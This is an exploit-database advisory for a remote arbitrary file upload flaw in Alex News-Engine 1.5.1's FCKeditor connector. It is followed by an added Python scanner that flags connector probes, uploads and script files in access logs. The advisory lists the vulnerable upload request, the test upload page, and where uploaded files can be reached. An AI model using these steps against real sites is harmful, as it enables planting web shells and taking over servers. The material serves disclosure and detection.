0day Today Exploits Market and 0day Exploits Database

Alex News-Engine 1.5.1 Remote Arbitrary File Upload Vulnerability

Author: Batter
Risk: [Security Risk Unsorted]
0day-ID: 0day-ID-4203
Category: web applications
Date added: 19-11-2008
Platform: unsorted
=================================================================
Alex News-Engine 1.5.1 Remote Arbitrary File Upload Vulnerability
=================================================================


########################################################################
#
#                        Yellow Flood Organization
#
# Alex News-engine (fckeditor) Arbitrary File Upload
#
# Source: http://www.alexscriptengine.de/blog/category/news-engine/
#
# Download: http://www.alexscriptengine.de/blog/asedownloads/news-engine/
#
# Discovered by: Batter
#
########################################################################



####################
- Vulnerability:
####################

/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/

####################
- Exploit:
####################

http://www.site.com/path/admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html

####################
- How to use:
####################

http://www.site.com/script-folder-name/script-folder-name/images/site_images/uploadet-file.*

####################
- Solution:
####################

Restrict access to these resources so that only trusted users can reach them.
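
To check whether the connector has already been reached on a deployed site, the following added example (not part of the original advisory) scans web access logs for requests to the connector path and for script files served from the upload directory named above. The log lines are constructed, and the combined log format and the list of executable extensions are assumptions to adapt to the server in question.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Connector path and upload directory as they appear in the advisory (lowercased).
CONNECTOR = "/fckeditor/editor/filemanager/browser/default/connectors/"
UPLOAD_DIR = "/images/site_images/"
# Assumption: extensions the server would execute; adjust to its handler mapping.
SCRIPT_EXT = (".php", ".php3", ".php5", ".phtml", ".pht")
# Assumption: Apache/nginx combined log format (client ... "METHOD target PROTO" status).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" \d{3} ')

# Constructed sample log lines (documentation IP ranges, hypothetical /news/ install path).
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Nov/2008:10:01:02 +0000] "GET /news/admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html HTTP/1.1" 200 4312 "-" "-"',
    '203.0.113.7 - - [19/Nov/2008:10:01:40 +0000] "POST /news/admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/ HTTP/1.1" 200 150 "-" "-"',
    '203.0.113.7 - - [19/Nov/2008:10:02:05 +0000] "GET /news/images/site_images/a.php HTTP/1.1" 200 12 "-" "-"',
    '198.51.100.4 - - [19/Nov/2008:10:03:00 +0000] "GET /news/images/site_images/logo.png HTTP/1.1" 200 900 "-" "-"',
]

def classify(line):
    """Return (client, finding) for a suspicious log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, method, target = m.groups()
    parts = urlsplit(target)
    path = unquote(parts.path).lower()  # decode %xx and ignore case
    commands = [v.lower() for k, vs in parse_qs(parts.query).items()
                if k.lower() == "command" for v in vs]
    if CONNECTOR in path:
        if method.upper() == "POST" and "fileupload" in commands:
            return client, "connector-upload"
        return client, "connector-probe"
    if UPLOAD_DIR in path and path.endswith(SCRIPT_EXT):
        return client, "script-in-upload-dir"
    return None

def scan(lines):
    """Return (line_number, client, finding) for every flagged line."""
    findings = []
    for n, line in enumerate(lines, 1):
        hit = classify(line)
        if hit:
            findings.append((n, *hit))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Any `connector-upload` or `script-in-upload-dir` hit from a client that is not a known administrator warrants inspecting the contents of the upload directory.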


